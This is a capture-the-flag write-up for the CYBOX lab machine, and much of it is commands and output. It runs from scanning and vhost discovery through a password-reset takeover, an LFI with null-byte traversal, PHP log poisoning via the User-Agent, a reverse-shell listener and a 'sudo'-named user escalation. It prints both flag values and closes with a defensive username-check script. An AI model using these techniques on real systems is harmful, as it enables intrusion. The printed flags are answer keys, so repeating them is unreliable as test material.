Will you be able to compromise the internal server of the CYBOX company?
Objective: Get user.txt and root.txt
This works better with VirtualBox rather than VMware.
Let's scan our network to find the IP of the box.
```
$ sudo netdiscover
 Currently scanning: 192.168.30.0/16   |   Screen View: Unique Hosts

 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 264
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.40    08:00:27:e2:7c:c9      1      60  PCS Systemtechnik GmbH
 ...
```
Port scan:

```
$ nmap -p -1024 -T4 -oN scan.nmap 192.168.1.40
PORT    STATE SERVICE
21/tcp  open  ftp
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
143/tcp open  imap
443/tcp open  https
```

There are many open ports: FTP, mail (SMTP, POP3 and IMAP) and web (HTTP and HTTPS).
I try an anonymous login on the FTP server, but it doesn't work.

Nothing interesting on this static web page apart from the admin email address, which gives us a valid username and the domain (cybox.company).
The HTTPS certificate confirms the validity of the admin email address.
```
/C=US/ST=New York/L=New York City/O=Cybox Company/OU=Cybox/CN=cybox.company/emailAddress=email@example.com
```

gobuster was running in the background to find new endpoints.
```
$ /opt/gobuster dir -w /opt/directory-list-lowercase-2.3-medium.txt -x php,txt,html -t 30 --url 192.168.1.40 -q -o gobuster.dir
/index.html           (Status: 200) [Size: 8514]
/assets               (Status: 301) [Size: 237] [--> https://cybox.company/assets/]
/phpmyadmin           (Status: 403) [Size: 92]
```

The /phpmyadmin endpoint answers that it is only reachable through localhost. I try changing the Host HTTP header, but it does not work:

```
$ curl -H "Host: localhost" http://192.168.1.40/phpmyadmin
For security reasons, this URL is only accesible using localhost (127.0.0.1) as the hostname
$ curl -H "Host: 127.0.0.1" http://192.168.1.40/phpmyadmin
For security reasons, this URL is only accesible using localhost (127.0.0.1) as the hostname
```
So I try to bruteforce virtual hosts; maybe we can find some new web applications.

```
$ /opt/gobuster vhost -w /opt/directory-list-lowercase-2.3-medium.txt -t 30 --url http://cybox.company -q -o vhost.dir
Found: register.cybox.company (Status: 200) [Size: 1252]
Found: dev.cybox.company (Status: 200) [Size: 209]
Found: webmail.cybox.company (Status: 302) [Size: 0]
Found: monitor.cybox.company (Status: 302) [Size: 0]
Found: ftp.cybox.company (Status: 200) [Size: 5295]
```

Add them to the /etc/hosts file.

```
$ cat /etc/hosts
192.168.1.40 cybox.company register.cybox.company dev.cybox.company webmail.cybox.company monitor.cybox.company ftp.cybox.company
```
Yes, there are many apps! Let's create a user on the register app.

Now we can log into the webmail and the monitor app. We have no mail and the monitor has no content. Let's try to reset our password.
Let's check our emails.
OK, now what if we tamper with the reset link?

Yes! We can reset the admin password on the monitor app! We now have access to a new admin panel.

After looking at the source code of the page, we find this:

```
<link href="styles.php?style=general" type="text/css" rel="stylesheet">
```
Maybe we can do an LFI (Local File Inclusion) on the style parameter. After some URL guessing we find a CSS file at /admin/styles/general.css, so styles.php probably includes styles/<style>.css.

After a few quick tries, we can confirm the LFI. The trailing %00 null byte truncates the appended .css suffix; that trick only works on PHP versions before 5.3.4, so it also tells us the box runs an old PHP.

```
http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../etc/passwd%00
root:x:0:0::/root:/bin/bash
...
```
Now let's try to load log files. After some path bruteforcing we find the Apache access log of the ftp.cybox.company app at /opt/bitnami/apache2/logs/access_log.

By making HTTP requests to the FTP app we control the content of the access_log file, so we can inject PHP code into it through the User-Agent header (-A). The payload is single-quoted so the shell does not eat the inner double quotes:

```
$ curl "http://ftp.cybox.company/index.php" -A '<?php echo "toto"; ?>'
```

Go to http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../opt/bitnami/apache2/logs/access_log%00 and the poisoned line comes back with the PHP already evaluated:

```
...
192.168.1.30 - - [03/Jan/2021:21:55:55 +0100] "GET /index.php HTTP/1.1" 200 5295 "-" "toto"
```
The PHP code is executed! My first reverse shell attempt fails: the cybox machine can't reach my box on the usual ports, probably because of egress firewall rules. So I listen on port 80 instead, and it works!

```
$ nc -lvnp 80
Connection from 192.168.1.32:41542
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
python: /opt/bitnami/common/lib/libz.so.1: no version information available (required by python)
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```
We have our first shell! Let's find the user.txt flag!

```
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd
bash: cd: HOME not set
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd /home
daemon@cybox:/home$ ls
admin  cybox  toto
daemon@cybox:/home$ cd cybox
daemon@cybox:/home/cybox$ ls
user.txt
daemon@cybox:/home/cybox$ cat user.txt
d85da08f1a31ef96fb6d4f608611bca2
```

We can switch to the user toto:toto that we created earlier on the register app (not required to root the box).
After some enumeration we find a weird SUID binary at /opt/registerlauncher. It is the ELF that creates the system users for accounts registered on the register app (like our user toto). It takes one parameter: the name of the user to create.

I look for known vulnerabilities in the ELF but find nothing.

So I ask myself: which user could we create to gain privileges? Remember that at the beginning I created a user toto whose password was also toto. I try running the binary with root as parameter, hoping it would reset the root password to root, but I get "user already exists". RIP

After some research, my friend W00dy finds that if we create a user named sudo, we can run any command with sudo by providing the password sudo.

```
toto@cybox:/tmp$ /opt/registerlauncher sudo
firstname.lastname@example.org has been created successfully. The credentials are sudo:sudo. You should change your default password for security.
toto@cybox:/tmp$ su sudo
Password: sudo
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

sudo@cybox:/tmp$ sudo -l
[sudo] password for sudo: sudo
Matching Defaults entries for sudo on cybox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sudo may run the following commands on cybox:
    (ALL : ALL) ALL
sudo@cybox:/tmp$ sudo su
root@cybox:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
```
We are root !
```
root@cybox:/tmp# cat /etc/sudoers
...
# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL
...
root@cybox:/tmp# cat /root/root.txt
4c0183fdd736e2b8fb3f57ddbfa8ce36
```

The user sudo is not listed by name in /etc/sudoers; what matches is the `%sudo ALL=(ALL:ALL) ALL` group rule. The launcher presumably gives each new account a primary group with the same name as the user, and for the name sudo that is the existing sudo group, so the freshly created account inherits unrestricted sudo rights.
Root flag !
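The root cause is a self-service registration that turns arbitrary names into system accounts without checking them against existing users, groups and sudoers principals. As an added example (not part of the original writeup), here is the check such a registration endpoint should run before calling the launcher. The /etc/group and /etc/sudoers contents are constructed samples in the shape of an Ubuntu install, with the same `%sudo` rule the box shows; the assumption that the launcher puts a new user in a group of its own name is labelled as such in the code.

```python
import re

# Constructed sample data (not from the box): a trimmed /etc/group and
# /etc/sudoers in the shape of an Ubuntu install, with the %sudo rule
# the writeup shows.
SAMPLE_GROUP = """root:x:0:
daemon:x:1:
adm:x:4:syslog
sudo:x:27:admin
www-data:x:33:
admin:x:1000:
cybox:x:1001:
"""

SAMPLE_SUDOERS = """Defaults        env_reset
# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""

# Conservative username shape: lowercase, no leading digit or dash.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def sudoers_principals(text):
    """Users and groups granted something in a sudoers file.

    Only plain user specs and %group specs are handled; alias definitions
    and #include directives are out of scope for this check."""
    users, groups = set(), set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        if re.match(r"(User|Runas|Host|Cmnd)_Alias\b", line):
            continue
        who = line.split()[0]
        (groups if who.startswith("%") else users).add(who.lstrip("%"))
    return users, groups


def group_names(text):
    """Group names from /etc/group-style content."""
    return {line.split(":")[0] for line in text.splitlines() if line.strip()}


def username_conflicts(name, group_text, sudoers_text):
    """Reasons to refuse a self-service registration name (empty list = OK).

    Assumption (mirrors what registerlauncher presumably does): a new user
    whose name equals an existing group is placed in that group by the
    user-private-group convention, so 'sudo' inherits the %sudo rule."""
    reasons = []
    if not USERNAME_RE.fullmatch(name):
        reasons.append("not a plain lowercase username")
    if name in group_names(group_text):
        reasons.append("collides with existing group '%s'" % name)
    users, groups = sudoers_principals(sudoers_text)
    if name in groups:
        reasons.append("matches sudoers group rule %%%s" % name)
    if name in users:
        reasons.append("matches sudoers user rule for '%s'" % name)
    return reasons


if __name__ == "__main__":
    for candidate in ("toto", "sudo", "admin", "backup", "Root"):
        verdict = username_conflicts(candidate, SAMPLE_GROUP, SAMPLE_SUDOERS) or "ok"
        print(candidate, "->", verdict)
```

On a real host, feed it the live files (`open("/etc/group").read()`, and `sudo -l -U name` or `visudo -c` output where sudoers is not readable), and additionally reject names already present in /etc/passwd. Rejecting any collision with an existing group is the important part: it closes the `sudo` case and every other privileged group (adm, docker, wheel) in one rule.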